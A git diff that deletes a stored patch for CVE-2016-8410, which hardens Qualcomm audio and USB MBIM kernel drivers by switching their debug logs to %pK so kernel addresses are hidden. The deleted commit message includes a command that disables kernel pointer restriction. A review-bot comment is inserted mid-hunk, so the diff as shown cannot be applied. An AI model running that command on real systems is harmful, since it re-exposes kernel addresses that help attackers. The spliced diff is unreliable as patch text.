mbim); - - req->context = NULL; - if (req->status || req->actual != req->length) { -@@ -941,7 +941,7 @@ static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req) - invalid: - usb_ep_set_halt(ep); - -- pr_err("dev:%p Failed\n", mbim); -+ pr_err("dev:%pK Failed\n", mbim); - - return; - } -@@ -963,7 +963,7 @@ fmbim_cmd_complete(struct usb_ep *ep, struct usb_request *req) - return; - } - -- pr_debug("dev:%p port#%d\n", dev, dev->port_num); -+ pr_debug("dev:%pK port#%d\n", dev, dev->port_num); - - cpkt = mbim_alloc_ctrl_pkt(len, GFP_ATOMIC); - if (!cpkt) { -@@ -1313,7 +1313,7 @@ static int mbim_set_alt(struct usb_function *f, unsigned intf, unsigned alt) - return ret; - } - -- pr_info("Set mbim port in_desc = 0x%p", -+ pr_info("Set mbim port in_desc = 0x%pK", - mbim->bam_port.in->desc); - - ret = config_ep_by_speed(cdev->gadget, f, -@@ -1325,7 +1325,7 @@ static int mbim_set_alt(struct usb_function *f, unsigned intf, unsigned alt) - return ret; - } - -- pr_info("Set mbim port out_desc = 0x%p", -+ pr_info("Set mbim port out_desc = 0x%pK", - mbim->bam_port.out->desc); - - if (mbim->xport == USB_GADGET_XPORT_BAM2BAM_IPA diff --git a/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch deleted file mode 100644 index 399fe062..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch +++ /dev/null 
@@ -1,1747 +0,0 @@ -From e2bbf665187a1f0a1248e4a088823cb182153ba9 Mon Sep 17 00:00:00 2001 -From: Ben Romberger -Date: Wed, 18 May 2016 17:15:50 -0700 -Subject: ASoC: msm: qdsp6v2: Change audio drivers to use %pK - -Change all qdsp6v2 audio driver to use %pK instead -of %p. %pK hides addresses when the users doesn't -have kernel permissions. If address information -is needed echo 0 > /proc/sys/kernel/kptr_restrict. - -Change-Id: I7baa9f127266726fecf9238167a1e0128a258847 -Signed-off-by: Ben Romberger -Signed-off-by: Surendar karka ---- - drivers/soc/qcom/qdsp6v2/apr.c | 12 ++-- - drivers/soc/qcom/qdsp6v2/msm_audio_ion.c | 37 ++++++------ - sound/soc/msm/qdsp6v2/audio_cal_utils.c | 4 +- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 16 +++--- - sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 4 +- - sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c | 4 +- - sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 4 +- - sound/soc/msm/qdsp6v2/msm-dts-eagle.c | 32 +++++------ - sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c | 4 +- - sound/soc/msm/qdsp6v2/msm-lsm-client.c | 24 ++++---- - sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c | 6 +- - sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c | 6 +- - sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c | 6 +- - sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c | 6 +- - sound/soc/msm/qdsp6v2/q6adm.c | 24 ++++---- - sound/soc/msm/qdsp6v2/q6afe.c | 28 ++++----- - sound/soc/msm/qdsp6v2/q6asm.c | 82 +++++++++++++-------------- - sound/soc/msm/qdsp6v2/q6core.c | 8 +-- - sound/soc/msm/qdsp6v2/q6lsm.c | 22 +++---- - sound/soc/msm/qdsp6v2/q6voice.c | 28 ++++----- - sound/soc/msm/qdsp6v2/rtac.c | 26 ++++----- - 21 files changed, 192 insertions(+), 191 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/apr.c b/drivers/soc/qcom/qdsp6v2/apr.c -index e88703d..06e7a05 100644 ---- a/drivers/soc/qcom/qdsp6v2/apr.c -+++ b/drivers/soc/qcom/qdsp6v2/apr.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2010-2016, The Linux Foundation. 
All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -513,7 +513,7 @@ void apr_cb_func(void *buf, int len, void *priv) - pr_debug("\n*****************\n"); - - if (!buf || len <= APR_HDR_SIZE) { -- pr_err("APR: Improper apr pkt received:%p %d\n", buf, len); -+ pr_err("APR: Improper apr pkt received:%pK %d\n", buf, len); - return; - } - hdr = buf; -@@ -599,7 +599,7 @@ void apr_cb_func(void *buf, int len, void *priv) - return; - } - pr_debug("svc_idx = %d\n", i); -- pr_debug("%x %x %x %p %p\n", c_svc->id, c_svc->dest_id, -+ pr_debug("%x %x %x %pK %pK\n", c_svc->id, c_svc->dest_id, - c_svc->client_id, c_svc->fn, c_svc->priv); - data.payload_size = hdr->pkt_size - hdr_size; - data.opcode = hdr->opcode; -@@ -663,7 +663,7 @@ static void apr_reset_deregister(struct work_struct *work) - container_of(work, struct apr_reset_work, work); - - handle = apr_reset->handle; -- pr_debug("%s:handle[%p]\n", __func__, handle); -+ pr_debug("%s:handle[%pK]\n", __func__, handle); - apr_deregister(handle); - kfree(apr_reset); - } -@@ -696,7 +696,7 @@ int apr_deregister(void *handle) - client[dest_id][client_id].svc_cnt--; - if (!client[dest_id][client_id].svc_cnt) { - svc->need_reset = 0x0; -- pr_debug("%s: service is reset %p\n", __func__, svc); -+ pr_debug("%s: service is reset %pK\n", __func__, svc); - } - } - -@@ -724,7 +724,7 @@ void apr_reset(void *handle) - - if (!handle) - return; -- pr_debug("%s: handle[%p]\n", __func__, handle); -+ pr_debug("%s: handle[%pK]\n", __func__, handle); - - if (apr_reset_workqueue == NULL) { - pr_err("%s: apr_reset_workqueue is NULL\n", __func__); -diff --git a/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c b/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c -index 52c97e4..470be30 100644 ---- a/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c -+++ b/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2015, The Linux 
Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -103,11 +103,11 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client, - pr_err("%s: ION memory mapping for AUDIO failed\n", __func__); - goto err_ion_handle; - } -- pr_debug("%s: mapped address = %p, size=%zd\n", __func__, -+ pr_debug("%s: mapped address = %pK, size=%zd\n", __func__, - *vaddr, bufsz); - - if (bufsz != 0) { -- pr_debug("%s: memset to 0 %p %zd\n", __func__, *vaddr, bufsz); -+ pr_debug("%s: memset to 0 %pK %zd\n", __func__, *vaddr, bufsz); - memset((void *)*vaddr, 0, bufsz); - } - -@@ -153,7 +153,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client, - bufsz should be 0 and fd shouldn't be 0 as of now - */ - *handle = ion_import_dma_buf(*client, fd); -- pr_debug("%s: DMA Buf name=%s, fd=%d handle=%p\n", __func__, -+ pr_debug("%s: DMA Buf name=%s, fd=%d handle=%pK\n", __func__, - name, fd, *handle); - if (IS_ERR_OR_NULL((void *) (*handle))) { - pr_err("%s: ion import dma buffer failed\n", -@@ -184,7 +184,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client, - rc = -ENOMEM; - goto err_ion_handle; - } -- pr_debug("%s: mapped address = %p, size=%zd\n", __func__, -+ pr_debug("%s: mapped address = %pK, size=%zd\n", __func__, - *vaddr, bufsz); - - return 0; -@@ -207,7 +207,7 @@ int msm_audio_ion_free(struct ion_client *client, struct ion_handle *handle) - } - if (msm_audio_ion_data.smmu_enabled) { - /* Need to populate book kept infomation */ -- pr_debug("client=%p, domain=%p, domain_id=%d, group=%p", -+ pr_debug("client=%pK, domain=%pK, domain_id=%d, group=%pK", - client, msm_audio_ion_data.domain, - msm_audio_ion_data.domain_id, msm_audio_ion_data.group); - -@@ -273,7 +273,7 @@ int msm_audio_ion_mmap(struct audio_buffer *ab, - offset = 0; - } 
- len = min(len, remainder); -- pr_debug("vma=%p, addr=%x len=%ld vm_start=%x vm_end=%x vm_page_prot=%ld\n", -+ pr_debug("vma=%pK, addr=%x len=%ld vm_start=%x vm_end=%x vm_page_prot=%ld\n", - vma, (unsigned int)addr, len, - (unsigned int)vma->vm_start, - (unsigned int)vma->vm_end, -@@ -296,8 +296,8 @@ int msm_audio_ion_mmap(struct audio_buffer *ab, - , __func__ , ret); - return ret; - } -- pr_debug("phys=%pa len=%zd\n", &phys_addr, phys_len); -- pr_debug("vma=%p, vm_start=%x vm_end=%x vm_pgoff=%ld vm_page_prot=%ld\n", -+ pr_debug("phys=%pK len=%zd\n", &phys_addr, phys_len); -+ pr_debug("vma=%pK, vm_start=%x vm_end=%x vm_pgoff=%ld vm_page_prot=%ld\n", - vma, (unsigned int)vma->vm_start, - (unsigned int)vma->vm_end, vma->vm_pgoff, - (unsigned long int)vma->vm_page_prot); -@@ -333,7 +333,7 @@ struct ion_client *msm_audio_ion_client_create(const char *name) - - void msm_audio_ion_client_destroy(struct ion_client *client) - { -- pr_debug("%s: client = %p smmu_enabled = %d\n", __func__, -+ pr_debug("%s: client = %pK smmu_enabled = %d\n", __func__, - client, msm_audio_ion_data.smmu_enabled); - - ion_client_destroy(client); -@@ -355,7 +355,7 @@ int msm_audio_ion_import_legacy(const char *name, struct ion_client *client, - bufsz should be 0 and fd shouldn't be 0 as of now - */ - *handle = ion_import_dma_buf(client, fd); -- pr_debug("%s: DMA Buf name=%s, fd=%d handle=%p\n", __func__, -+ pr_debug("%s: DMA Buf name=%s, fd=%d handle=%pK\n", __func__, - name, fd, *handle); - if (IS_ERR_OR_NULL((void *)(*handle))) { - pr_err("%s: ion import dma buffer failed\n", -@@ -421,7 +421,7 @@ int msm_audio_ion_cache_operations(struct audio_buffer *abuff, int cache_op) - int msm_cache_ops = 0; - - if (!abuff) { -- pr_err("Invalid params: %p, %p\n", __func__, abuff); -+ pr_err("%s: Invalid params: %pK\n", __func__, abuff); - return -EINVAL; - } - rc = ion_handle_get_flags(abuff->client, abuff->handle, -@@ -467,7 +467,7 @@ static int msm_audio_ion_get_phys(struct ion_client *client, - 
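Review bot: In the msm_audio_ion_mmap hunk (`@@ -296,8 +296,8 @@`) the specifier being replaced is `%pa`, not `%p`, and the argument is still `&phys_addr`. `%pa` dereferences its argument and prints the physical address, whereas `%pK` prints the pointer it is handed, so `pr_debug("phys=%pK len=%zd\n", &phys_addr, phys_len)` now logs where the variable lives (or zeros under kptr_restrict) under a label that still says `phys=`. The physical address no longer reaches the log, which is the aim, but the field is misleading; I would drop it, e.g. `pr_debug("len=%zd\n", phys_len);`. The same applies to `phys=%pK` with `&(*addr)` in the msm_audio_ion_get_phys hunk and, judging from the format string alone since its argument list runs past the hunk, to `paddr 0x%pK` in create_cal_block in audio_cal_utils.c.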
pr_err("%s: ION map iommu failed %d\n", __func__, rc); - return rc; - } -- pr_debug("client=%p, domain=%p, domain_id=%d, group=%p", -+ pr_debug("client=%pK, domain=%pK, domain_id=%d, group=%pK", - client, msm_audio_ion_data.domain, - msm_audio_ion_data.domain_id, msm_audio_ion_data.group); - /* Append the SMMU SID information to the address */ -@@ -476,7 +476,8 @@ static int msm_audio_ion_get_phys(struct ion_client *client, - /* SMMU is disabled*/ - rc = ion_phys(client, handle, addr, len); - } -- pr_debug("phys=%pa, len=%zd, rc=%d\n", &(*addr), *len, rc); -+ pr_debug("phys=%pK, len=%zd, rc=%d\n", &(*addr), *len, rc); -+ - return rc; - } - -@@ -540,18 +541,18 @@ static int msm_audio_ion_probe(struct platform_device *pdev) - msm_audio_ion_data.domain = - iommu_group_get_iommudata(msm_audio_ion_data.group); - if (IS_ERR_OR_NULL(msm_audio_ion_data.domain)) { -- pr_err("Failed to get domain data for group %p", -+ pr_err("Failed to get domain data for group %pK", - msm_audio_ion_data.group); - goto fail_group; - } - msm_audio_ion_data.domain_id = - msm_find_domain_no(msm_audio_ion_data.domain); - if (msm_audio_ion_data.domain_id < 0) { -- pr_err("Failed to get domain index for domain %p", -+ pr_err("Failed to get domain index for domain %pK", - msm_audio_ion_data.domain); - goto fail_group; - } -- pr_debug("domain=%p, domain_id=%d, group=%p", -+ pr_debug("domain=%pK, domain_id=%d, group=%pK", - msm_audio_ion_data.domain, - msm_audio_ion_data.domain_id, msm_audio_ion_data.group); - -@@ -575,7 +576,7 @@ fail_group: - - static int msm_audio_ion_remove(struct platform_device *pdev) - { -- pr_debug("%s: msm audio ion is unloaded, domain=%p, group=%p\n", -+ pr_debug("%s: msm audio ion is unloaded, domain=%pK, group=%pK\n", - __func__, msm_audio_ion_data.domain, msm_audio_ion_data.group); - iommu_detach_group(msm_audio_ion_data.domain, msm_audio_ion_data.group); - -diff --git a/sound/soc/msm/qdsp6v2/audio_cal_utils.c b/sound/soc/msm/qdsp6v2/audio_cal_utils.c -index 
67275df..562e9a1 100644 ---- a/sound/soc/msm/qdsp6v2/audio_cal_utils.c -+++ b/sound/soc/msm/qdsp6v2/audio_cal_utils.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -599,7 +599,7 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type, - goto err; - } - cal_block->buffer_number = basic_cal->cal_hdr.buffer_number; -- pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pa!\n", -+ pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pK!\n", - __func__, cal_type->info.reg.cal_type, - cal_block->buffer_number, - cal_block->map_data.ion_map_handle, -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -index 82de46c..5071be9 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -192,7 +192,7 @@ static void compr_event_handler(uint32_t opcode, - pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n", - __func__, prtd->pcm_count, prtd->out_head); - temp = buf[0].phys + (prtd->out_head * prtd->pcm_count); -- pr_debug("%s:writing buffer[%d] from 0x%pa\n", -+ pr_debug("%s:writing buffer[%d] from 0x%pK\n", - __func__, prtd->out_head, &temp); - - if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -@@ -243,7 +243,7 @@ static void compr_event_handler(uint32_t opcode, - break; - case ASM_DATA_EVENT_READ_DONE_V2: { - pr_debug("ASM_DATA_EVENT_READ_DONE\n"); -- pr_debug("buf = %p, data = 0x%X, *data = %p,\n" -+ pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n" - "prtd->pcm_irq_pos = %d\n", - prtd->audio_client->port[OUT].buf, - *(uint32_t *)prtd->audio_client->port[OUT].buf->data, -@@ -253,7 +253,7 @@ static void compr_event_handler(uint32_t opcode, - memcpy(prtd->audio_client->port[OUT].buf->data + - prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE), - COMPRE_CAPTURE_HEADER_SIZE); -- pr_debug("buf = %p, updated data = 0x%X, *data = %p\n", -+ pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n", - prtd->audio_client->port[OUT].buf, - *(uint32_t *)(prtd->audio_client->port[OUT].buf->data + - prtd->pcm_irq_pos), -@@ -269,7 +269,7 @@ static void compr_event_handler(uint32_t opcode, - } - buf = prtd->audio_client->port[OUT].buf; - -- pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pa\n", -+ pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pK\n", - prtd->pcm_irq_pos, &buf[0].phys); - read_param.len = prtd->pcm_count - COMPRE_CAPTURE_HEADER_SIZE; - read_param.paddr = buf[0].phys + -@@ -295,7 +295,7 @@ static void compr_event_handler(uint32_t opcode, - pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n", - __func__, prtd->pcm_count, prtd->out_head); - buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s: 
writing buffer[%d] from 0x%pa head %d count %d\n", -+ pr_debug("%s: writing buffer[%d] from 0x%pK head %d count %d\n", - __func__, prtd->out_head, &buf[0].phys, - prtd->pcm_count, prtd->out_head); - if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -@@ -602,7 +602,7 @@ static int msm_compr_capture_prepare(struct snd_pcm_substream *substream) - - COMPRE_CAPTURE_HEADER_SIZE; - read_param.paddr = buf[i].phys - + COMPRE_CAPTURE_HEADER_SIZE; -- pr_debug("Push buffer [%d] to DSP, paddr: %pa, vaddr: %p\n", -+ pr_debug("Push buffer [%d] to DSP, paddr: %pK, vaddr: %pK\n", - i, &read_param.paddr, - buf[i].data); - q6asm_async_read(prtd->audio_client, &read_param); -@@ -963,7 +963,7 @@ static int msm_compr_hw_params(struct snd_pcm_substream *substream, - dma_buf->addr = buf[0].phys; - dma_buf->bytes = runtime->hw.buffer_bytes_max; - -- pr_debug("%s: buf[%p]dma_buf->area[%p]dma_buf->addr[%pa]\n" -+ pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pK]\n" - "dma_buf->bytes[%zd]\n", __func__, - (void *)buf, (void *)dma_buf->area, - &dma_buf->addr, dma_buf->bytes); -diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -index bb0cb9f..7aac112 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -2056,7 +2056,7 @@ static int msm_compr_get_caps(struct snd_compr_stream *cstream, - memcpy(arg, &prtd->compr_cap, sizeof(struct snd_compr_caps)); - } else { - ret = -EINVAL; -- pr_err("%s: arg (0x%p), prtd (0x%p)\n", __func__, arg, prtd); -+ pr_err("%s: arg (0x%pK), prtd (0x%pK)\n", __func__, arg, prtd); - } - - return ret; -diff --git a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c -index ee5a340..8ef8f49 100644 ---- a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1861,7 +1861,7 @@ static int msm_auxpcm_dev_probe(struct platform_device *pdev) - goto fail_pdata_nomem; - } - -- dev_dbg(&pdev->dev, "%s: dev %p, dai_data %p, auxpcm_pdata %p\n", -+ dev_dbg(&pdev->dev, "%s: dev %pK, dai_data %pK, auxpcm_pdata %pK\n", - __func__, &pdev->dev, dai_data, auxpcm_pdata); - - rc = of_property_read_u32_array(pdev->dev.of_node, -diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -index ace747d..fea7bb4 100644 ---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -@@ -1103,7 +1103,7 @@ static int msm_ds2_dap_send_end_point(int dev_map_idx, int endp_idx) - ds2_ap_params_obj = &ds2_dap_params[cache_device]; - pr_debug("%s: cache dev %d, dev_map_idx %d\n", __func__, - cache_device, dev_map_idx); -- pr_debug("%s: endp - %p %p\n", __func__, -+ pr_debug("%s: endp - %pK %pK\n", __func__, - &ds2_dap_params[cache_device], ds2_ap_params_obj); - - params_value = 
kzalloc(params_length, GFP_KERNEL); -@@ -1189,7 +1189,7 @@ static int msm_ds2_dap_send_cached_params(int dev_map_idx, - } - - ds2_ap_params_obj = &ds2_dap_params[cache_device]; -- pr_debug("%s: cached param - %p %p, cache_device %d\n", __func__, -+ pr_debug("%s: cached param - %pK %pK, cache_device %d\n", __func__, - &ds2_dap_params[cache_device], ds2_ap_params_obj, - cache_device); - params_value = kzalloc(params_length, GFP_KERNEL); -diff --git a/sound/soc/msm/qdsp6v2/msm-dts-eagle.c b/sound/soc/msm/qdsp6v2/msm-dts-eagle.c -index 3a6a9c2..465947f 100644 ---- a/sound/soc/msm/qdsp6v2/msm-dts-eagle.c -+++ b/sound/soc/msm/qdsp6v2/msm-dts-eagle.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -470,7 +470,7 @@ static int _sendcache_pre(struct audio_client *ac) - err = -EINVAL; - if ((_depc_size == 0) || !_depc || (size == 0) || - cmd == 0 || ((offset + size) > _depc_size) || (err != 0)) { -- eagle_precache_err("%s: primary device %i cache index %i general error - cache size = %u, cache ptr = %p, offset = %u, size = %u, cmd = %i", -+ eagle_precache_err("%s: primary device %i cache index %i general error - cache size = %u, cache ptr = %pK, offset = %u, size = %u, cmd = %i", - __func__, _device_primary, cidx, _depc_size, _depc, - offset, size, cmd); - return -EINVAL; -@@ -554,7 +554,7 @@ NT_MODE_GOTO: - err = -EINVAL; - if ((_depc_size == 0) || !_depc || (err != 0) || (size == 0) || - (cmd == 0) || (offset + size) > _depc_size) { -- eagle_postcache_err("%s: primary device %i cache index %i port_id 0x%X general error - cache size = %u, cache ptr = %p, offset = %u, size = %u, cmd = %i", -+ eagle_postcache_err("%s: primary device %i cache index %i port_id 0x%X general error - cache size = %u, cache ptr = %pK, 
offset = %u, size = %u, cmd = %i", - __func__, _device_primary, cidx, port_id, - _depc_size, _depc, offset, size, cmd); - return -EINVAL; -@@ -1042,7 +1042,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - eagle_ioctl_info("%s: called with control 0x%X (allocate param cache)", - __func__, cmd); - if (copy_from_user((void *)&size, (void *)arg, sizeof(size))) { -- eagle_ioctl_err("%s: error copying size (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error copying size (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &size, sizeof(size)); - return -EFAULT; - } else if (size > DEPC_MAX_SIZE) { -@@ -1082,7 +1082,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - eagle_ioctl_info("%s: control 0x%X (get param)", - __func__, cmd); - if (copy_from_user((void *)&depd, (void *)arg, sizeof(depd))) { -- eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &depd, sizeof(depd)); - return -EFAULT; - } -@@ -1153,7 +1153,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - eagle_ioctl_info("%s: control 0x%X (set param)", - __func__, cmd); - if (copy_from_user((void *)&depd, (void *)arg, sizeof(depd))) { -- eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &depd, sizeof(depd)); - return -EFAULT; - } -@@ -1186,7 +1186,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - if (copy_from_user((void *)&_depc[offset], - (void *)(((char *)arg)+sizeof(depd)), - depd.size)) { -- eagle_ioctl_err("%s: error copying param to cache (src:%p, tgt:%p, size:%u)", -+ eagle_ioctl_err("%s: error copying param to cache (src:%pK, tgt:%pK, size:%u)", - __func__, ((char *)arg)+sizeof(depd), - &_depc[offset], depd.size); - return -EFAULT; 
-@@ -1205,7 +1205,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - eagle_ioctl_info("%s: with control 0x%X (set param cache block)", - __func__, cmd); - if (copy_from_user((void *)b_, (void *)arg, sizeof(b_))) { -- eagle_ioctl_err("%s: error copying cache block data (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error copying cache block data (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, b_, sizeof(b_)); - return -EFAULT; - } -@@ -1236,7 +1236,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - eagle_ioctl_dbg("%s: with control 0x%X (set active device)", - __func__, cmd); - if (copy_from_user((void *)data, (void *)arg, sizeof(data))) { -- eagle_ioctl_err("%s: error copying active device data (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error copying active device data (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, data, sizeof(data)); - return -EFAULT; - } -@@ -1258,7 +1258,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - __func__, cmd); - if (copy_from_user((void *)&target, (void *)arg, - sizeof(target))) { -- eagle_ioctl_err("%s: error reading license index. (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error reading license index. 
(src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &target, sizeof(target)); - return -EFAULT; - } -@@ -1305,7 +1305,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - cmd); - if (copy_from_user((void *)target, (void *)arg, - sizeof(target))) { -- eagle_ioctl_err("%s: error reading license index (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error reading license index (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, target, sizeof(target)); - return -EFAULT; - } -@@ -1348,7 +1348,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - (void *)&(((u32 *)_sec_blob[target[0]])[1]), - (void *)(((char *)arg)+sizeof(target)), - target[1])) { -- eagle_ioctl_err("%s: error copying license to index %u, size %u (src:%p, tgt:%p, size:%u)", -+ eagle_ioctl_err("%s: error copying license to index %u, size %u (src:%pK, tgt:%pK, size:%u)", - __func__, target[0], target[1], - ((char *)arg)+sizeof(target), - &(((u32 *)_sec_blob[target[0]])[1]), -@@ -1365,7 +1365,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - cmd); - if (copy_from_user((void *)&target, (void *)arg, - sizeof(target))) { -- eagle_ioctl_err("%s: error reading license index (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error reading license index (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &target, sizeof(target)); - return -EFAULT; - } -@@ -1395,7 +1395,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - __func__, cmd); - if (copy_from_user((void *)&spec, (void *)arg, - sizeof(spec))) { -- eagle_ioctl_err("%s: error reading volume command specifier (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error reading volume command specifier (src:%pK, tgt:%pK, size:%zu)", - __func__, (void *)arg, &spec, sizeof(spec)); - return -EFAULT; - } -@@ -1417,7 +1417,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - if (copy_from_user((void *)&_vol_cmds_d[idx], - (void *)(((char *)arg) + sizeof(int)), - 
sizeof(struct vol_cmds_d))) { -- eagle_ioctl_err("%s: error reading volume command descriptor (src:%p, tgt:%p, size:%zu)", -+ eagle_ioctl_err("%s: error reading volume command descriptor (src:%pK, tgt:%pK, size:%zu)", - __func__, ((char *)arg) + sizeof(int), - &_vol_cmds_d[idx], - sizeof(struct vol_cmds_d)); -@@ -1430,7 +1430,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg) - if (copy_from_user((void *)_vol_cmds[idx], - (void *)(((char *)arg) + (sizeof(int) + - sizeof(struct vol_cmds_d))), size)) { -- eagle_ioctl_err("%s: error reading volume command string (src:%p, tgt:%p, size:%i)", -+ eagle_ioctl_err("%s: error reading volume command string (src:%pK, tgt:%pK, size:%i)", - __func__, ((char *)arg) + (sizeof(int) + - sizeof(struct vol_cmds_d)), - _vol_cmds[idx], size); -diff --git a/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c b/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c -index ddfbcec..7c35d19 100644 ---- a/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c -+++ b/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2016, The Linux Foundation. All rights reserved. 
